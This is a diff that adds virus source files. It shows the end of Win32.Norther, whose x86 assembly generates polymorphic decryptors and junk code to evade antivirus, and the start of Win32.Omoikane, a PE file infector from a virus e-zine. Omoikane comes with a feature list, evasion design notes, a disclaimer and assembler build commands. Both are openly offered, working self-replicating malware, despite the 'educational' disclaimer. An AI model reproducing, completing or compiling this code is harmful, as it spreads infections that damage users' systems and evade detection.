WhereToWriteDecryptor] + call WriteInstruction1 + call WriteJunkCode + call WriteInstruction2 + call WriteJunkCode + call WriteInstruction3 + call WriteJunkCode + call WriteInstruction4 + call WriteJunkCode + mov dword ptr [ebp + PolyBuffer],edi ;saved for loop + call WriteInstruction5 + call WriteJunkCode + call WriteInstruction6 + call WriteJunkCode + call WriteInstruction7 + call WriteJunkCode + call WriteInstruction8 + call WriteJunkCode + call WriteInstruction9 + call WriteJunkCode + ret + + EncryptionMethod db 0 ;1=not 2=add 3=sub 4=xor + key dd 0 + WhereToWriteDecryptor dd 0 + StartOfDataToEncrypt dd 0 + ProgramImageBase dd 0 + PolyBuffer dd 0 + SizeOfDataToEncrypt equ (VirusSize/4);virus size in dwords + FixRVA dd 0 + +WriteInstruction1: + ;this function write pushad instruction + mov byte ptr [edi],60h ;pushad + inc edi + ret +WriteInstruction2: + ;this function set esi register to start of encrypted virus + call GenRandomNumber + mov ebx,[ebp + StartOfDataToEncrypt] + sub ebx,[ebp + mapbase] + add ebx,[ebp + ProgramImageBase] + add ebx,[ebp + FixRVA] + and eax,0ffh ;get random number between 0 ~ 255 + cmp eax,33h + ja ins2_1 + mov byte ptr [edi],0beh ;way 1: + mov dword ptr [edi + 1],ebx ;mov esi,StartOfDataToEncrypt + add edi,5h + jmp retins2 +ins2_1: cmp eax,66h + ja ins2_2 + mov byte ptr [edi],68h ;way 2: + mov dword ptr [edi + 1],ebx ;push StartOfDataToEncrypt + add edi,5h + call WriteJunkCode ;pop esi + mov byte ptr [edi],5eh + inc edi + jmp retins2 +ins2_2: cmp eax,99h + ja ins2_3 + mov word ptr [edi],0f633h ;way 3: + add edi,2h ;xor esi,esi + push ebx + call WriteJunkCode + pop ebx + call _ins2oresival + jmp retins2 +ins2_3: cmp eax,0cch + ja ins2_4 + mov word ptr [edi],0f62bh ;way 4 + add edi,2h ;sub esi,esi + push ebx + call WriteJunkCode + pop ebx + call _ins2oresival + jmp retins2 +ins2_4: not ebx ;way 5 + mov byte ptr [edi],0beh ;mov esi,not StartOfDataToEncrypt + mov dword ptr [edi + 1],ebx + add edi,5h + call WriteJunkCode + mov word ptr [edi],0d6f7h ;not esi + add edi,2h +retins2:ret +_ins2oresival: + ;write or esi,StartOfDataToEncrypt instruction + mov word ptr [edi],0ce81h + mov dword ptr [edi + 2],ebx + add edi,6h + ret + +WriteInstruction3: + ;this function set edi register to esi register + call GenRandomNumber + and eax,0c8h + cmp eax,32h + ja ins3_1 + mov word ptr [edi],0fe8bh ;mov edi,esi + add edi,2h + jmp retins3 +ins3_1: cmp eax,64h + ja ins3_2 + mov byte ptr [edi],56h ;push esi + inc edi + call WriteJunkCode + mov byte ptr [edi],5fh ;pop edi + inc edi + jmp retins3 +ins3_2: cmp eax,96h + ja ins3_3 + mov word ptr [edi],0fe87h ;xchg edi esi + add edi,2h + call WriteJunkCode + mov word ptr [edi],0f78bh ;mov esi,edi + add edi,2h + jmp retins3 +ins3_3: mov word ptr [edi],0f787h ;xchg edi esi + add edi,2h + call WriteJunkCode + mov word ptr [edi],0f78bh ;mov esi,edi + add edi,2h +retins3:ret + +WriteInstruction4: + ;this function set ecx with the size of the virus in dwords + call GenRandomNumber + mov ebx,SizeOfDataToEncrypt + and eax,0ffh + cmp eax,33h + ja ins4_1 + mov byte ptr [edi],0b9h ;mov ecx,sizeofvirusindwords + mov dword ptr [edi + 1],ebx + add edi,5h + jmp retins4 +ins4_1: cmp eax,66h + ja ins4_2 + mov byte ptr [edi],68h ;push sizeofvirusindwords + mov dword ptr [edi + 1],ebx + add edi,5h + call WriteJunkCode + mov byte ptr [edi],59h ;pop ecx + inc edi + jmp retins4 +ins4_2: cmp eax,99h + ja ins4_3 + mov word ptr [edi],0c933h ;xor ecx,ecx + add edi,2h + push ebx + call WriteJunkCode + pop ebx + call _ins4orecxval + jmp retins4 +ins4_3: cmp eax,0cch + ja ins4_4 + mov word ptr [edi],0c92bh ;sub ecx,ecx + add edi,2h + push ebx + call WriteJunkCode + pop ebx + call _ins4orecxval + jmp retins4 +ins4_4: not ebx + mov byte ptr [edi],0b9h ;mov ecx,not sizeofvirusindwords + mov dword ptr [edi + 1],ebx + add edi,5h + call WriteJunkCode + mov word ptr [edi],0d1f7h + add edi,2h +retins4:ret +_ins4orecxval: + mov word ptr [edi],0c981h + mov dword ptr [edi + 2],ebx + add edi,6h + ret +WriteInstruction5: + ;this function read 4 bytes from [esi] into eax + ;and add to esi register 4 (if there is need to do so). + call GenRandomNumber + and eax,12ch + cmp eax,64h + ja ins5_1 + mov byte ptr [edi],0adh ;lodsd + inc edi + jmp retins5 +ins5_1: cmp eax,0c8h + ja ins5_2 + mov word ptr [edi],068bh ;mov eax,dword ptr [esi] + add edi,2h + call _ins5addesi4 + jmp retins5 +ins5_2: mov word ptr [edi],36ffh ;push dword ptr [esi] + add edi,2h + call WriteJunkCode + mov byte ptr [edi],58h ;pop eax + inc edi + call _ins5addesi4 +retins5:ret + +_ins5addesi4: + ;this function write add to esi register 4 + call GenRandomNumber + and eax,64h + cmp eax,32h + ja addesi4_2 + mov word ptr [edi],0c683h ;way 1 + mov byte ptr [edi + 2],4h ;add esi,4h + add edi,3h + jmp raddesi +addesi4_2: + mov ecx,4h ;way 2 +@incesi:mov byte ptr [edi],46h + inc edi + call WriteJunkCode + loop @incesi +raddesi:ret + + +WriteInstruction6: + ;this function decrypt the value of eax + mov ebx,dword ptr [ebp + key] + cmp byte ptr [ebp + EncryptionMethod],1h + jne ins6_1 + mov word ptr [edi],0d0f7h ;not eax + add edi,2h + jmp retins6 +ins6_1: cmp byte ptr [ebp + EncryptionMethod],2h + jne ins6_2 + mov byte ptr [edi],2dh ;sub eax,key + mov dword ptr [edi + 1],ebx + add edi,5h + jmp retins6 +ins6_2: cmp byte ptr [ebp + EncryptionMethod],3h + jne ins6_3 + mov byte ptr [edi],05h ;add eax,key + mov dword ptr [edi + 1],ebx + add edi,5h + jmp retins6 +ins6_3: mov byte ptr [edi],35h + mov dword ptr [edi + 1],ebx ;xor eax,key + add edi,5h + jmp retins6 +retins6:ret + + + + +WriteInstruction7: + ;this function copy the value of eax to [edi] + call GenRandomNumber + and eax,258h + cmp eax,0c8h + ja ins7_1 + mov byte ptr [edi],0abh ;stosd + inc edi + jmp retins7 +ins7_1: cmp eax,190h + ja ins7_2 + mov word ptr [edi],0789h ;mov dword ptr [edi],eax + add edi,2h + call WriteJunkCode + call addedi4 + jmp retins7 +ins7_2: mov byte ptr [edi],50h ;push eax + inc edi + call WriteJunkCode + mov word ptr [edi],078fh ;pop dword ptr [edi] + add edi,2h + call addedi4 +retins7:ret + +addedi4: + call GenRandomNumber + and eax,12ch + cmp eax,96h + ja _addedi4 + mov word ptr [edi],0c783h + mov byte ptr [edi + 2],4h + add edi,3h + jmp retins7a +_addedi4: + mov ecx,4h +@incedi:mov byte ptr [edi],47h ;inc edi + inc edi + call WriteJunkCode + loop @incedi +retins7a:ret + + +WriteInstruction8: + ;this function write the loop instruction of the decryptor + call GenRandomNumber + and eax,12ch + cmp eax,96h + ja ins8_1 + mov byte ptr [edi],49h ;dec ecx + inc edi + call WriteJunkCode + mov word ptr [edi],0f983h + mov byte ptr [edi + 2],0h ;cmp ecx,0h + add edi,3h + mov eax,dword ptr [ebp + PolyBuffer] + sub eax,edi + mov byte ptr [edi],75h ;jne + sub eax,2h + mov byte ptr [edi + 1],al + add edi,2h + jmp retins8 +ins8_1: mov eax,dword ptr [ebp + PolyBuffer] + sub eax,edi + mov byte ptr [edi],0e2h ;loop + sub eax,2h + mov byte ptr [edi + 1],al + add edi,2h +retins8:ret + + +WriteInstruction9: + ;this istruction write a code in the stack,that jump into virus code + call GenRandomNumber + mov ebx,[ebp + StartOfDataToEncrypt] + sub ebx,[ebp + mapbase] + add ebx,[ebp + ProgramImageBase] + add ebx,[ebp + FixRVA] ;offset to jump + mov dword ptr [ebp + push_and_ret + 1],ebx ;save address + ;push 'push offset' & 'ret' instructions to the stack + ;way 1: + ; push xxx + ; push xxx + ;way 2: + ; mov reg,xxx + ; push reg + ; mov reg,xxx + ; push reg + ;way 3: + ; mov reg,xored xxx + ; push reg + ; xor dword ptr [esp],xored val + ; mov reg,xored xxx + ; push reg + ; xor dword ptr [esp],xored val + ;------------------------------------------------------ + and eax,4b0h + cmp eax,190h + ja I9_A + xor ecx,ecx ;way 1 !!! + mov cx,word ptr [ebp + push_and_ret+4] + mov byte ptr [edi],68h + mov dword ptr [edi + 1h],ecx ;gen push xxx + add edi,5h + call WriteJunkCode + xor ecx,ecx + mov ecx,dword ptr [ebp + push_and_ret] + mov byte ptr [edi],68h + mov dword ptr [edi +1h],ecx ;gen push xxx + add edi,5h + jmp I9_Exit +I9_A: cmp eax,320h + ja I9_B + xor eax,eax + mov ax,word ptr [ebp + push_and_ret+4] + call GenMoveAndPush + xor eax,eax + mov eax,dword ptr [ebp + push_and_ret] + call GenMoveAndPush + jmp I9_Exit +I9_B: call GenRandomNumber + xchg ebx,eax + xor eax,eax + mov ax,word ptr [ebp + push_and_ret+4] + xor eax,ebx + call GenMoveAndPush + call _WriteJunkCode + mov al,81h + stosb + mov ax,2434h + stosw + xchg ebx,eax + push eax + stosd + xor eax,eax + mov eax,dword ptr [ebp + push_and_ret] + xor eax,dword ptr [esp] + call GenMoveAndPush + call _WriteJunkCode + pop ebx + mov al,81h + stosb + mov ax,2434h + stosw + xchg ebx,eax + stosd +I9_Exit: + Call WriteJunkCode + ;gen a SEH frame that jump into the stack + ;---------------------------------------- + ;gen 'push esp' + ;way 1: + ; push esp + ;way 2: + ; mov reg,esp + ; push reg + ;------------------------------------------ + call GenRandomNumber + and eax,4b0h ;get number between 0 ~ 1200 + cmp eax,258h + ja _PushEsp1 + mov al,54h ;push esp + stosb + jmp ___1__ +_PushEsp1: + call GenRandomNumber ;way 2: + and eax,7h ;move reg,esp + push eax ;push reg + mov ecx,8h + mul ecx + xchg al,ah + add ah,0c4h + mov al,8bh + stosw + call _WriteJunkCode + pop eax + add al,50h + stosb +___1__: + call WriteJunkCode + ;gen 'push dword ptr fs:[0]' + ;way 1: + ; push dword ptr fs:[0] + ;way 2: + ; xor/sub reg,reg + ; push dword ptr fs:[reg] + ;way 3: + ; xor/sub reg,reg + ; push dword ptr fs:[reg+reg] + ;-------------------------------------------- + call GenRandomNumber + and eax,4b0h + cmp eax,190h + ja _nW + mov eax,36FF6764h + stosd + xor eax,eax + stosw + jmp NextIns +_nW: cmp eax,320h + ja _nW2 + call GenEmptyReg + push ecx + call _WriteJunkCode + pop ecx + sub ch,0c0h + xor eax,eax + mov al,ch + mov ecx,9h + div ecx + xchg al,cl + mov ax,0ff64h + stosw + xchg al,cl + add al,30h + stosb + jmp NextIns +_nW2: call GenEmptyReg + push ecx + call _WriteJunkCode + pop ecx + sub ch,0c0h + xchg ah,ch + mov al,34h + shl eax,10h + mov ax,0ff64h + stosd +NextIns: + call WriteJunkCode + ;gen 'mov fs:[0],esp + ;way 1: + ; mov fs:[0],esp + ;way 2: + ; xor/sub reg,reg + ; mov fs:[reg],esp + ;way 3: + ; mov reg,esp + ; mov fs:[0],reg + ;--------------------------------------------- + call GenRandomNumber + and eax,4b0h + cmp eax,190h + ja __nW1 + mov eax,26896764h + stosd + xor eax,eax + stosw + jmp GenF +__nW1: cmp eax,320h + ja __nW2 + call GenEmptyReg + sub ch,0c0h + push ecx + call _WriteJunkCode + pop ecx + xor eax,eax + mov al,ch + mov ecx,9h + div ecx + push eax + mov ax,8964h + stosw + pop eax + add al,20h + stosb + jmp GenF +__nW2: call GenMovRegEsp + push ecx + call _WriteJunkCode + pop ecx + add cl,0eh + mov eax,89676400h + mov al,cl + ror eax,8h + stosd + xor eax,eax + stosw +GenF: + ;gen 'page fault',in order to jump + ;way 1: + ; int 3 + ;way 2: + ; ud2 -> undefine instruction (0fh,0bh) + ;way 3: + ; mov ecx,0\xor ecx,ecx\sub ecx\ecx + ; div ecx + ;-------------------------------------------------------- + call GenRandomNumber + and eax,384h + cmp eax,12ch + ja _F_1 + mov al,0cch + stosb + jmp ExitGF +_F_1: cmp eax,258h + ja _F_2 + mov ax,0b0fh + stosw + jmp ExitGF +_F_2: call GenRandomNumber + and eax,384h + cmp eax,12ch + ja _ecx0_1 + mov al,0b9h + stosb + xor eax,eax + stosd + jmp div_ecx +_ecx0_1:cmp eax,258h + ja _ecx0_2 + mov ax,0c92bh + stosw + jmp div_ecx +_ecx0_2:mov ax,0c933h + stosw +div_ecx:call WriteJunkCode + mov ax,0f1f7h + stosw +ExitGF: ret + + ;instructions to generate in the stack: + push_and_ret db 68h,0,0,0,0,0c3h + + +_WriteJunkCode: ;gen junk code that dont destroy registers + call GenRandomNumber + and eax,5208h + cmp eax,0bb8h + ja _WJC1 + call GenAndReg + jmp ExitJC +_WJC1: cmp eax,1770h + ja _WJC2 + call GenJump + jmp ExitJC +_WJC2: cmp eax,2328h + ja _WJC3 + call GenPushPop + jmp ExitJC +_WJC3: cmp eax,2ee0h + ja _WJC4 + call GenIncDec + jmp ExitJC +_WJC4: cmp eax,3a98h + ja _WJC5 + call GenMoveRegReg + jmp ExitJC +_WJC5: call OneByte +ExitJC: ret + +;output cl:reg id +GenMovRegEsp: + call GenRandomNumber + and eax,00000600h + mov ecx,8h + mul ecx + mov cl,ah + add ah,0cch + mov al,8bh + stosw + ret + +;output ch:reg id +GenEmptyReg: + call GenRandomNumber + xor ecx,ecx + and eax,5208h + cmp eax,0bb8h + ja _ER + mov ch,0c0h + jmp _ER_ +_ER: cmp eax,1770h + ja _ER2 + mov ch,0dbh + jmp _ER_ +_ER2: cmp eax,2328h + ja _ER3 + mov ch,0c9h + jmp _ER_ +_ER3: cmp eax,2ee0h + ja _ER4 + mov ch,0d2h + jmp _ER_ +_ER4: cmp eax,3a98h + ja _ER5 + mov ch,0ffh + jmp _ER_ +_ER5: mov ch,0f6h +_ER_: call GenRandomNumber + cmp ah,80h + ja _ER__ + mov cl,33h + jmp _E_R +_ER__: mov cl,2bh +_E_R: mov ax,cx + stosw + ret + + +GenMoveAndPush: + push eax ;number to mov & push +No_Esp: call GenRandomNumber + and al,7h + mov cl,al + add al,0b8h + cmp al,0bch + je No_Esp + stosb + pop eax + stosd + push ecx + call _WriteJunkCode ;gen junk between the mov and the push + pop eax + add al,50h + stosb + ret + +InitRandomNumber: + call [ebp + GetTickCount] + mov dword ptr [ebp + RandomNumber],eax + ret + RandomNumber dd 0 +GenRandomNumber: ;a simple random num generator + pushad + mov eax,dword ptr [ebp + RandomNumber] + and eax,12345678h + mov cl,ah + ror eax,cl + add eax,98765abdh + mov ecx,12345678h + mul ecx + add eax,edx + xchg ah,al + sub eax,edx + mov dword ptr [ebp + RandomNumber],eax + popad + mov eax,dword ptr [ebp + RandomNumber] + ret + +WriteJunkCode: + call GenRandomNumber ;split this procedure + and eax,3e8h ;to four procedure's + cmp eax,0fah ;in order to give each + ja _jnk1 ;junkcode the same chance + call WriteJunkCode1 + jmp ExitJunk +_jnk1: cmp eax,1f4h + ja _jnk2 + call WriteJunkCode2 + jmp ExitJunk +_jnk2: cmp eax,2eeh + ja _jnk3 + call WriteJunkCode3 + jmp ExitJunk +_jnk3: call WriteJunkCode4 +ExitJunk:ret + + + + +WriteJunkCode1: + call GenRandomNumber + and eax,3e8h + cmp eax,0fah + ja _jnk_1 + call GenAndReg ;1 + jmp ExtJunk1 +_jnk_1: cmp eax,1f4h + ja _jnk_2 + call GenJump ;2 + jmp ExtJunk1 +_jnk_2: cmp eax,2eeh + ja _jnk_3 + call GenPushPop ;3 + jmp ExtJunk1 +_jnk_3: call GenIncDec ;4 +ExtJunk1:ret + + +WriteJunkCode2: + call GenRandomNumber + and eax,3e8h + cmp eax,0fah + ja _jn_k1 + call GenMoveRegReg ;5 + jmp ExtJunk2 +_jn_k1: cmp eax,1f4h + ja _jn_k2 + call GenAnd ;6 + jmp ExtJunk2 +_jn_k2: cmp eax,2eeh + ja _jn_k3 + call GenMove ;7 + jmp ExtJunk2 +_jn_k3: call GenPushTrashPopReg ;8 +ExtJunk2:ret + + +WriteJunkCode3: + call GenRandomNumber + and eax,3e8h + cmp eax,0fah + ja _j_nk1 + call GenShrReg ;9 + jmp ExtJunk3 +_j_nk1: cmp eax,1f4h + ja _j_nk2 + call GenShlReg ;10 + jmp ExtJunk3 +_j_nk2: cmp eax,2eeh + ja _j_nk3 + call GenRorReg ;11 + jmp ExtJunk3 +_j_nk3: call GenRolReg ;12 +ExtJunk3:ret + + +WriteJunkCode4: + call GenRandomNumber + and eax,3e8h + cmp eax,0fah + ja __jnk1 + call GenOrReg ;13 + jmp ExtJunk4 +__jnk1: cmp eax,1f4h + ja __jnk2 + call GenXorReg ;14 + jmp ExtJunk4 +__jnk2: cmp eax,2eeh + ja __jnk3 + call GenSubAddTrash ;15 + jmp ExtJunk4 +__jnk3: call OneByte ;16 +ExtJunk4:ret + + + + +GenAndReg: + ;this function generate and reg,reg instruction + call GenRandomNumber + and eax,1f40h + cmp eax,3e8h + ja and2 + mov ah,0c0h + jmp exitand +and2: cmp eax,7d0h + ja and3 + mov ah,0dbh + jmp exitand +and3: cmp eax,0bb8h + ja and4 + mov ah,0c9h + jmp exitand +and4: cmp eax,0fa0h + ja and5 + mov ah,0d2h + jmp exitand +and5: cmp eax,1388 + ja and6 + mov ah,0ffh + jmp exitand +and6: cmp eax,1770h + ja and7 + mov ah,0f6h + jmp exitand +and7: cmp eax,1b58h + ja and8 + mov ah,0edh + jmp exitand +and8: mov ah,0e4h +exitand:mov al,23h + stosw + ret + +GenJump: + ;this function generate do nothing condition jump + call GenRandomNumber + and eax,0fh + add eax,70h + stosw + ret + +GenPushPop: + ;this function generate push reg \ pop reg instruction + call GenRandomNumber + and eax,7h + add eax,50h + stosb + add eax,8h + stosb + ret + +GenIncDec: + ;this function generate:inc reg\dec reg or dec reg\inc reg instruction + call GenRandomNumber + cmp al,7fh + ja decinc + and eax,7h + add eax,40h + stosb + add eax,8h + stosb + jmp exitincd +decinc: and eax,7h + add eax,48h + mov byte ptr [edi],al + stosb + sub eax,8h + mov byte ptr [edi],al + stosb +exitincd:ret + + +GenMoveRegReg: ;gen mov reg,reg + call GenRandomNumber + and eax,1f40h + cmp eax,3e8h + ja mreg2 + mov ah,0c0h + jmp exitmreg +mreg2: cmp eax,7d0h + ja mreg3 + mov ah,0dbh + jmp exitmreg +mreg3: cmp eax,0bb8h + ja mreg4 + mov ah,0c9h + jmp exitmreg +mreg4: cmp eax,0fa0h + ja mreg5 + mov ah,0d2h + jmp exitmreg +mreg5: cmp eax,1388 + ja mreg6 + mov ah,0ffh + jmp exitmreg +mreg6: cmp eax,1770h + ja mreg7 + mov ah,0f6h + jmp exitmreg +mreg7: cmp eax,1b58h + ja mreg8 + mov ah,0edh + jmp exitmreg +mreg8: mov ah,0e4h +exitmreg: + mov al,8bh + stosw + ret + +GenAnd: + ;this function generate and ebx\edx\ebp,trash instruction + call GenRandomNumber + push eax + cmp al,50h + ja nand1 + mov ah,0e3h + jmp wand +nand1: cmp al,0a0h + ja nand2 + mov ah,0e2h + jmp wand +nand2: mov ah,0e5h +wand: mov al,81h + stosw + pop eax + stosd + ret + +GenMove: + ;this function generate mov ebx\edx\ebp,trash instruction + call GenRandomNumber + push eax + cmp al,50h + ja nmov1 + mov al,0bbh + jmp wmov +nmov1: cmp al,0a0h + ja nmov2 + mov al,0bah + jmp wmov +nmov2: mov al,0bdh +wmov: stosb + pop eax + stosd + ret + +GenPushTrashPopReg: + ;this function generate push trash\ pop ebp\ebx\edx instruction + call GenRandomNumber + mov byte ptr [edi],68h + inc edi + stosd + cmp al,55h + ja nextpt + mov byte ptr [edi],5dh + jmp wpop +nextpt: cmp al,0aah + ja nextpt2 + mov byte ptr [edi],5ah + jmp wpop +nextpt2:mov byte ptr [edi],5bh +wpop: inc edi + ret + +GenShrReg: ;gen shr unusedreg,num + call GenRandomNumber + mov byte ptr [edi],0c1h + inc edi + cmp al,50h + ja nshr + mov byte ptr [edi],0edh + jmp wshr +nshr: cmp al,0a0h + ja nshr2 + mov byte ptr [edi],0eah + jmp wshr +nshr2: mov byte ptr [edi],0ebh +wshr: inc edi + stosb + ret + +GenShlReg: ;gen shl unusedreg,num + call GenRandomNumber + mov byte ptr [edi],0c1h + inc edi + cmp al,50h + ja nshl + mov byte ptr [edi],0e3h + jmp wshl +nshl: cmp al,0a0h + ja nshl2 + mov byte ptr [edi],0e2h + jmp wshl +nshl2: mov byte ptr [edi],0e5h +wshl: inc edi + stosb + ret + +GenRorReg: ;gen ror unusedreg,num + call GenRandomNumber + mov byte ptr [edi],0c1h + inc edi + cmp al,50h + ja nror + mov byte ptr [edi],0cbh + jmp wror +nror: cmp al,0a0h + ja nror2 + mov byte ptr [edi],0cah + jmp wror +nror2: mov byte ptr [edi],0cdh +wror: inc edi + stosb + ret + + +GenRolReg: ;gen rol unusedreg,num + call GenRandomNumber + mov byte ptr [edi],0c1h + inc edi + cmp al,50h + ja nrol + mov byte ptr [edi],0c3h + jmp wrol +nrol: cmp al,0a0h + ja nrol2 + mov byte ptr [edi],0c2h + jmp wrol +nrol2: mov byte ptr [edi],0c5h +wrol: inc edi + stosb + ret + +GenOrReg: ;gen or unusedreg,num + call GenRandomNumber + push eax + mov al,81h + cmp ah,50h + ja nor + mov ah,0cbh + jmp wor +nor: cmp ah,0a0h + ja nor2 + mov ah,0cah + jmp wor +nor2: mov ah,0cdh +wor: stosw + pop eax + stosd + ret + +GenXorReg: ;gen xor unusedreg,num + call GenRandomNumber + push eax + mov al,81h + cmp ah,50h + ja nXor + mov ah,0f3h + jmp wXor +nXor: cmp ah,0a0h + ja nXor2 + mov ah,0f2h + jmp wXor +nXor2: mov ah,0f5h +wXor: stosw + pop eax + stosd + ret + + +GenSubAddTrash: ;gen add reg,num\sub reg,num +noesp: call GenRandomNumber + mov ebx,eax + cmp al,80h + ja sub_f + and ah,7h + add ah,0c0h + cmp ah,0c4h + je noesp + mov al,81h + stosw + mov eax,ebx + stosd + mov eax,ebx + and ah,7h + add ah,0e8h + mov al,81h + stosw + mov eax,ebx + stosd + jmp exitsa +sub_f: and ah,7h + add ah,0e8h + cmp ah,0ech + je noesp + mov al,81h + stosw + mov eax,ebx + stosd + mov eax,ebx + and ah,7h + add ah,0c0h + mov al,81h + stosw + mov eax,ebx + stosd +exitsa: ret + +OneByte: ;gen one byte do nothing instruction + call GenRandomNumber + cmp al,32h + ja byte1 + mov al,90h + jmp end_get_byte +byte1: cmp al,64h + ja byte2 + mov al,0f8h + jmp end_get_byte +byte2: cmp al,96h + ja byte3 + mov al,0f5h + jmp end_get_byte +byte3: cmp al,0c8h + ja byte4 + mov al,0f9h + jmp end_get_byte +byte4: mov al,0fch +end_get_byte: + stosb + ret + + +;------------------------------------------------------------------------------------ + + db 10h dup(?) ;padding + + VirusEnd equ $ + +FirstGen: + push 0h + push offset Message + push offset Title_ + push 0h + call MessageBoxA + push 0h + call GetModuleHandleA + push eax + call ExitProcess + + Message db "Win32.Norther By DR-EF",0 +if DEBUG + Title_ db "[Win32.Norther]",0 +else + Title_ db "[Win32.Norther] Relese Version",0 +endif + +End Norther \ No newline at end of file diff --git a/Win32/Win32.Omoikane.asm b/Win32/Win32.Omoikane.asm new file mode 100644 index 00000000..f1d7ecf1 --- /dev/null +++ b/Win32/Win32.Omoikane.asm @@ -0,0 +1,2123 @@ + COMMENT ` ---------------------------------------------------------------- )=- + -=( Natural Selection Issue #1 ---------------------------- Win32.Omoikane )=- + -=( ---------------------------------------------------------------------- )=- + + -=( 0 : Win32.Omoikane Features ------------------------------------------ )=- + + Imports: GetModuleHandleA and ExitProcess from host, rest are direct + from Kernel32 + Infects: PE files containing GetModuleHandleA. Expands last code + section, write decryptor to code section. ExitProcess of host + patched to run decryptor, which decrypts the virus into a large + enough data section. Write bit not set on the code section. + Strategy: Does a traversal starting at the root dir on the current drive + picking random sub-directories, stopping when either there are + no more directories, or some new files were infected. + Compatibility: All tested windows versions, doesn't infect SFCs + Saves Stamps: Yes + MultiThreaded: No + Polymorphism: A small slow-polymorphic decryptor in the empty space at end of + the code segment which uses a series of randomly generated + encryption instructions, and a couple algorithms. + AntiAV / EPO: Runs on ExitProcess. Anti-bait: Does not infect goat files + (small, incorrect make-up, weird filenames, etc) or anything in + goat directories (too many exes, same sizes, etc). + SEH Abilities: None + Payload: 1/8 times, writes baka.wav into the windows directory and sets + the registry to use it as the new Critical Error sound (heard + when an application crashes). + + -=( 1 : Win32.Omoikane Design Goals -------------------------------------- )=- + + : Infect PE files without adding a second code section + : NOT setting the write bit on a code section + : Use Good Encryption + + This virus was created to see if the above objectives were feasible. With the + advent of the PE executable and advances in the anti-virus industry, new PE + viruses are generally easy prey for AVs due to one or more of the following + reasons: + + : Entry point outside the code section. Some compression engines do this too, + but any AV which this does not red-flag is crap. + : Writable Code section. Almost no clean exe has this bit set. Almost all + viruses do.... hmm... I wonder if the AV noticed this? + : Lousy Encryption. As written in Matrix#2, AVs can cut through bad + encryption methods as if they were not there. + + Thus, this virus was born. + + This virus, hides it's body in the last section of the host file (encrypted of + course). It writes a small, POLYMORPHIC decryptor into the slack space at the + end of the code section. It then patches the exe by looking for all "call + [ExitProcess]" or "jmp [ExitProcess]" (depending on the linker) to jump to the + decryptor. Since all calls are patched, no other infection marker is needed. + + When the host finishes running and calls ExitProcess, it will jump to the + polymorphic decryptor. The decryptor then decrypts the data in the last + section of the file, and places it into a writable data section. Due to how + windows "works", data sections CAN have code in them. After the virus is done + decrypting, it jumps to the code in the data section and executes. + + When the virus executes, it goes into the root directory of the current drive + and attempts to infect files. If there are no files to infect, or a bait + directory is determined (using a complex set of criteria), then a random + subdirectory is chosen, and the infection process is repeated. (You can use + "subst" to create a new drive letter and run the file on it to test it + safely.) + + ...And so, some 2000 lines of code later - Mission Accomplished. + + -=( 2 : Win32.Omoikane Design Faults ------------------------------------- )=- + + The biggest problem is the reliance on GetModuleHandleA being present in the + host file. The other large problem is the inability to go hoping from one + drive to the next. + + There are various other things that, time permitting, should be improved. For + example adding more methods of encryption, and lots of optimization. But for + now... + + -=( 3 : Win32.Omoikane Disclaimer ---------------------------------------- )=- + + THE CONTENTS OF THIS ELECTRONIC MAGAZINE AND ITS ASSOCIATED SOURCE CODE ARE + COVERED UNDER THE BELOW TERMS AND CONDITIONS. IF YOU DO NOT AGREE TO BE BOUND + BY THESE TERMS AND CONDITIONS, OR ARE NOT LEGALLY ENTITLED TO AGREE TO THEM, + YOU MUST DISCONTINUE USE OF THIS MAGAZINE IMMEDIATELY. + + COPYRIGHT + Copyright on materials in this magazine and the information therein and + their arrangement is owned by FEATHERED SERPENTS unless otherwise indicated. + + RIGHTS AND LIMITATIONS + You have the right to use, copy and distribute the material in this + magazine free of charge, for all purposes allowed by your governing + laws. You are expressly PROHIBITED from using the material contained + herein for any purposes that would cause or would help promote + the illegal use of the material. + + NO WARRANTY + The information contained within this magazine are provided "as is". + FEATHERED SERPENTS do not warranty the accuracy, adequacy, + or completeness of given information, and expressly disclaims + liability for errors or omissions contained therein. No implied, + express, or statutory warranty, is given in conjunction with this magazine. + + LIMITATION OF LIABILITY + In *NO* event will FEATHERED SERPENTS or any of its MEMBERS be liable for any + damages including and without limitation, direct or indirect, special, + incidental, or consequential damages, losses, or expenses arising in + connection with this magazine, or the use thereof. + + ADDITIONAL DISCLAIMER + Computer viruses will spread of their own accord between computer systems, and + across international boundaries. They are raw animals with no concern for the + law, and for that reason your possession of them makes YOU responsible for the + actions they carry out. + + The viruses provided in this magazine are for educational purposes ONLY. They + are NOT intended for use in ANY WAY outside of strict, controlled laboratory + conditions. If compiled and executed these viruses WILL land you in court(s). + + You will be held responsible for your actions. As source code these viruses + are inert and covered by implied freedom of speech laws in some + countries. In binary form these viruses are malicious weapons. FEATHERED + SERPENTS do not condone the application of these viruses and will NOT be held + LIABLE for any MISUSE. + + -=( 4 : Win32.Omoikane Compile Instructions ------------------------------ )=- + + TASM32 5.0 & TLINK32 1.6.71.0 + + tasm32 /m /ml Omoikane.asm + tlink32 /Tpe /x Omoikane.obj, Omoikane.exe,,import32.lib + pewrsec Omoikane.exe + + -=( 5 : Win32.Omoikane --------------------------------------------------- ) ` + +%out Assembling file implies acceptance of disclaimer inside source code + +DEBUG equ 0 ; Toggle Slow/Fast Poly, etc +DEBUGENTRY equ 0 ; decryptor starts with an 'int 3' +DEBUGROOTDIR equ 0 ; 0= root dir, 1= 'goats' subdir + +if DEBUG +MINCODESIZE equ 100h ; Min Raw size of host's CS +MINHOSTSIZE equ 100h +else +MINCODESIZE equ 1000h +MINHOSTSIZE equ 10000h ; bad exe if < 10000h bytes +endif +MINSLACKSPACE equ 50 ; Need at least 50 bytes at end of CS +MAXEXEPERDIR equ 30 ; over 25 exes and skip dir +MAXBADEXE equ 7 ; 7 bad exes before skipping dir +MAXSAMESIZE equ 3 ; 3 same size files = goat dir +MAXSIZEPATTERN equ 3 ; 3 exes in same size increments. + + +.386 +.model flat, stdcall + +; ************************************************************************ +; Declarations +; ************************************************************************ +GetModuleHandleA PROCDESC WINAPI :DWORD + +OPEN_EXISTING equ 3 +FILE_SHARE_WRITE equ 0002h +FILE_BEGIN equ 0 +FILE_MAP_WRITE equ 2 +FILE_ATTRIBUTE_NORMAL equ 00000080h +INVALID_HANDLE_VALUE equ 0FFFFFFFFh +GENERIC_READ equ 80000000h +GENERIC_WRITE equ 40000000h +MAX_PATH equ 260 +CREATE_ALWAYS equ 2 +PAGE_READWRITE equ 00000004h +HKEY_USERS equ 80000003h +REG_SZ equ 1 +FILE_ATTRIBUTE_DIRECTORY equ 00000010h + +WIN32_FIND_DATA struct +fd_dwFileAttributes dd 0 